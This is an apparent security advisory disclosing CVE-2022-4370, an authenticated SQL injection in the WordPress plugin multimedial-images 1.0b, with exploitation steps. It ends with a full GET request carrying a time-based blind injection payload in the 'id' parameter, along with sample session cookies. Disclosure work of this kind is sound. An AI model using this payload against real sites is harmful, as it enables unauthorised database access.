multimedial-images 1.0b WordPress plugin SQL injection
Vulnerability Metadata
| Key | Value |
|---|---|
| Date of Disclosure | December 12 2022 |
| Affected Software | multimedial-images |
| Affected Software Type | WordPress plugin |
| Version | 1.0b |
| Weakness | SQL Injection |
| CWE ID | CWE-89 |
| CVE ID | CVE-2022-4370 |
| CVSS 3.x Base Score | n/a |
| CVSS 2.0 Base Score | n/a |
| Reporter | Daniel Krohmer, Kunal Sharma |
| Reporter Contact | daniel.krohmer@iese.fraunhofer.de |
| Link to Affected Software | https://wordpress.org/plugins/multimedial-images/ |
| Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-4370 |
Vulnerability Description
The id query parameter in multimedial-images 1.0b is vulnerable to SQL injection. An authenticated attacker may abuse the mmi page of the plugin to craft a malicious GET request.
Exploitation Guide
This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.
Login as admin user. This attack requires at least admin privileges.
Go to the Settings and then select Multimedial Images.
Uploade an image.
Select an arbitrary image file...
... and Save all changes.
Since the plugin is very buggy, you may need to insert the image path manually by clicking on Media Library...
... and Show...
... and Insert Into Post.
Save the image.
Next, click on Remove.
Clicking the previous button triggers the vulnerable request. id is the vulnerable query parameter.
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of id at line 100 in ./ultimedial_imagenes.php.
The final database query is called within the del_background function at line 90 in file ./multimedial_imagenes.php.
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
The SQL injection can be triggered by sending the request below.
GET /wp-admin/options-general.php?page=mmi&a=delbg&id=33+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/wp-admin/options-general.php?page=mmi
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1669457141%7CotH5c3MDrzK14OdNWXfLTBa1DY9ZllG9GuO3ruqHmCl%7C2fc3d70e2428acf2c33516d5f3ead10f94aef8a67512d1c7370221f22ad3cb1b; slt=87e6b56f-e72c-4f81-8246-c2348e20528b.1; wp-settings-time-1=1668871056; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1669457141%7CotH5c3MDrzK14OdNWXfLTBa1DY9ZllG9GuO3ruqHmCl%7C05889dde6e9a628b548d320f2834c1f11e68f1b629705454db0cbf55bf0f5a63
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1